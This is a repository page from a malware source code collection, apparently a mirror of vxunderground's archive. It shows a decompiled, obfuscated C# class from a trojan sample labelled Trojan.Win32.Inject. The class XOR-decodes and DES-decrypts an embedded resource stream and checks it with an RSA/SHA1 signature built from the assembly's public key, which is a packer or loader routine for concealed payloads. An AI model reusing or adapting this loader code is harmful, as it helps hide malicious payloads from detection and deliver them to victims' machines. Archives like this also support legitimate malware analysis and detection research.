ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-26 05:15:28 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/I/Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515/.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

160 lines
5.9 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
internal class \uE00C
{
private const int \uE000 = 8;
private const int \uE001 = 20;
private const int \uE002 = 4;
private static byte[] \uE003 = new byte[4];
private static byte[] \uE004 = new byte[4];
static \uE00C()
{
\uE00C.\uE003[0] = \uE00C.\uE004[0] = (byte) 82;
\uE00C.\uE003[1] = \uE00C.\uE004[1] = (byte) 83;
\uE00C.\uE003[2] = \uE00C.\uE004[2] = (byte) 65;
\uE00C.\uE003[3] = (byte) 49;
\uE00C.\uE004[3] = (byte) 50;
}
public static MemoryStream \uE000(Stream _param0)
{
BinaryReader binaryReader1 = new BinaryReader(_param0);
DESCryptoServiceProvider cryptoServiceProvider1 = new DESCryptoServiceProvider();
bool flag1 = binaryReader1.ReadBoolean();
int count1 = (int) binaryReader1.ReadUInt16();
byte[] buffer1 = new byte[count1];
binaryReader1.Read(buffer1, 0, count1);
if (flag1)
{
byte[] buffer2 = new byte[8];
binaryReader1.Read(buffer2, 0, 8);
for (int index = 0; index < count1; ++index)
buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]);
}
BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false));
int count2 = (int) binaryReader2.ReadByte();
byte[] buffer3 = new byte[count2];
binaryReader2.Read(buffer3, 0, count2);
cryptoServiceProvider1.IV = buffer3;
bool flag2 = binaryReader2.ReadBoolean();
int count3 = (int) binaryReader2.ReadByte();
byte[] numArray = new byte[count3];
if (flag2)
binaryReader2.Read(numArray, 0, count3);
RSACryptoServiceProvider cryptoServiceProvider2 = (RSACryptoServiceProvider) null;
int count4 = binaryReader2.ReadInt32();
byte[] buffer4 = new byte[count4];
binaryReader2.Read(buffer4, 0, count4);
if (!flag2)
{
byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey();
if (publicKey == null || publicKey.Length != 160)
throw new InvalidOperationException();
Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray, 0, count3);
numArray[5] |= (byte) 128;
cryptoServiceProvider2 = new RSACryptoServiceProvider();
cryptoServiceProvider2.ImportParameters(\uE00C.\uE000(publicKey));
}
cryptoServiceProvider1.Key = numArray;
MemoryStream memoryStream = new MemoryStream();
using (CryptoStream cryptoStream = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider1.CreateDecryptor(), CryptoStreamMode.Read))
\uE012.\uE000((Stream) cryptoStream, (Stream) memoryStream);
if (cryptoServiceProvider2 != null)
{
memoryStream.Position = 0L;
if (!\uE00C.\uE000(cryptoServiceProvider2, (Stream) memoryStream, buffer4))
throw new InvalidOperationException();
}
memoryStream.Position = 0L;
return memoryStream;
}
private static byte[] \uE000(byte[] _param0, int _param1, int _param2)
{
if (_param0 == null || _param0.Length < _param1 + _param2)
return (byte[]) null;
byte[] destinationArray = new byte[_param2];
Array.Copy((Array) _param0, _param1, (Array) destinationArray, 0, _param2);
return destinationArray;
}
private static RSAParameters \uE000(byte[] _param0)
{
bool flag = _param0.Length == 160;
if (flag && !\uE00C.\uE000(_param0, \uE00C.\uE003, 20))
{
RSAParameters rsaParameters = new RSAParameters();
ref RSAParameters local = ref rsaParameters;
return rsaParameters;
}
if (!flag && !\uE00C.\uE000(_param0, \uE00C.\uE004, 8))
{
RSAParameters rsaParameters = new RSAParameters();
ref RSAParameters local = ref rsaParameters;
return rsaParameters;
}
RSAParameters rsaParameters1 = new RSAParameters();
int num1 = (flag ? 20 : 8) + 8;
int num2 = 4;
rsaParameters1.Exponent = \uE00C.\uE000(_param0, num1, num2);
Array.Reverse((Array) rsaParameters1.Exponent);
int num3 = num1 + num2;
int num4 = 128;
rsaParameters1.Modulus = \uE00C.\uE000(_param0, num3, num4);
Array.Reverse((Array) rsaParameters1.Modulus);
if (flag)
return rsaParameters1;
int num5 = num3 + num4;
int num6 = 64;
rsaParameters1.P = \uE00C.\uE000(_param0, num5, num6);
Array.Reverse((Array) rsaParameters1.P);
int num7 = num5 + num6;
int num8 = 64;
rsaParameters1.Q = \uE00C.\uE000(_param0, num7, num8);
Array.Reverse((Array) rsaParameters1.Q);
int num9 = num7 + num8;
int num10 = 64;
rsaParameters1.DP = \uE00C.\uE000(_param0, num9, num10);
Array.Reverse((Array) rsaParameters1.DP);
int num11 = num9 + num10;
int num12 = 64;
rsaParameters1.DQ = \uE00C.\uE000(_param0, num11, num12);
Array.Reverse((Array) rsaParameters1.DQ);
int num13 = num11 + num12;
int num14 = 64;
rsaParameters1.InverseQ = \uE00C.\uE000(_param0, num13, num14);
Array.Reverse((Array) rsaParameters1.InverseQ);
int num15 = num13 + num14;
int num16 = 128;
rsaParameters1.D = \uE00C.\uE000(_param0, num15, num16);
Array.Reverse((Array) rsaParameters1.D);
return rsaParameters1;
}
private static bool \uE000(byte[] _param0, byte[] _param1, int _param2)
{
for (int index = 0; index < _param1.Length; ++index)
{
if ((int) _param0[index + _param2] != (int) _param1[index])
return false;
}
return true;
}
private static bool \uE000(RSACryptoServiceProvider _param0, Stream _param1, byte[] _param2)
{
byte[] hash = new SHA1Managed().ComputeHash(_param1);
return _param0.VerifyHash(hash, CryptoConfig.MapNameToOID("SHA1"), _param2);
}
}
Reference in New Issue View Git Blame Copy Permalink